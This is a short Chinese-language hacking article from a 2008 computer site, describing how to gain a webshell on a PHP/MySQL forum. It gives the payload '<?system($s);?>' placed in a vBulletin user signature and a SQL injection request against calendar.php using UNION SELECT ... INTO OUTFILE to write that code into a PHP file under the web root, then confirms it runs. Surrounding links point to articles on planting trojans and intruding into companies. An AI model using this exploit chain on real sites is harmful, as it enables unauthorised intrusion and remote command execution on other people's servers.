| 下载中心 | 文章中心 | 虚拟主机 | 网站开发 | 加入收藏 | 设为首页  
     热门搜索: 域名注册 网站建设 股票投资 招商引资 网络游戏 健身器材 美容美发 网络营销 电脑学校
   本站首页 | 公司资讯 | 业内资讯 | 服务器类 | 黑客相关 | 私服技术 | 家用电脑 | 网站建设 | 局域网类 | 网吧相关 | 游戏攻略 | 编程开发 | 软件应用 | 硬件维修 | 分类
 站内搜索:
  百度热门搜索: it教育 网络教育 网站推广 创业致富 电动车 太阳能 瘦身产品 公告: 联邦电脑十周年系列操作系统,快速稳定,欢迎下载使用!
  栏目导航
  相关文章
php+mysql注射得到webshell
作者:佚名  来源:不详  发布时间:2008-6-19 7:50:04  发布人:snlb

减小字体 增大字体

type="14230"> 思路:
把代码写入数据库,在通过注射导出webshell

演示:
还是用vbb的那个calendar.php的注射漏洞

首先编辑自己的资料,在“个性签名”里写代码 <?system($s);?>,

再action=edit&eventid=-1%20UNION%20SELECT%201,1,1,1,1,signature%20from%20user%20into%20outfile%20'A:5sound\EasyPHP\www\kaka.php'

打开kaka1.php
1    1    1    2000-00-01    <?system($s);?>    1

呵呵 php在运行中只认识<??> 所以上面的wenshell是可以运行的

测试成功。

呵呵 !! 现在没什么时间 简单把思路写出来了 改天写文章 hoho
[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:在视频文件中插入木马+防御方法
下一篇文章:入侵台灣中小企 創新育成公共論壇
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站地图
  联邦电脑版权所有 Copyright©1996-2004 联邦电脑 All Rights Reserved  
   xkej@sina.com 业务联系:0516-88380202 88085202 QQ: 81566563  
  苏ICP备05045772号 当前在线人数: